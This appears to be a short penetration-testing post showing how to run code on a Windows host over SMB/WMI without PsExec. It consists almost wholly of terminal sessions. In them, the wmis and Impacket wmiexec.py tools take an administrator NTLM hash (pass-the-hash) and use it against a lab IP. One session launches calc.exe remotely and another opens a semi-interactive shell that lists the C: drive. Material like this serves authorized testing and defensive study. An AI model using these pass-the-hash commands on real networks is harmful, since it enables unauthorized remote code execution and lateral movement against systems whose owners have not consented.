Executing code via SMB / DCOM without PSEXEC

root@wpad:~# wmisUsage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]        [--use-security-mechanisms=STRING] [-V|--version]        //hostExample: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt 

root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exeHASH PASS: Substituting user supplied NTLM HASH...HASH PASS: Substituting user supplied NTLM HASH...[wmi/wmis.c:172:main()] 1: calc.exeNTSTATUS: NT_STATUS_OK - Success

root@wpad:~/impacket/examples# ./wmiexec.py Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologiesusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]                  target [command [command ...]]positional arguments:  target                [domain/][username[:password]@]<address>  command               command to execute at the target. If empty it will                        launch a semi-interactive shelloptional arguments:  -h, --help            show this help message and exit  -share SHARE          share where the output will be grabbed from (default                        C$)  -nooutput             whether or not to print the output (no SMB connection                        created)authentication:  -hashes LMHASH:NTHASH                        NTLM hashes, format is LMHASH:NTHASH

root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141Impacket v0.9.12-dev - Copyright 2002-2014 Core Security TechnologiesSMBv2.1 dialect used[!] Launching semi-interactive shell - Careful what you executeC:\>dir Volume in drive C has no label. Volume Serial Number is 5CCA-B528 Directory of C:\07/13/2009  11:20 PM    <DIR>          PerfLogs10/07/2013  03:26 PM    <DIR>          Program Files07/14/2009  01:08 AM    <DIR>          Program Files (x86)04/25/2014  02:21 AM    <DIR>          Users05/11/2014  03:39 PM    <DIR>          Windows               0 File(s)              0 bytes               5 Dir(s)  52,884,389,888 bytes freeC:\>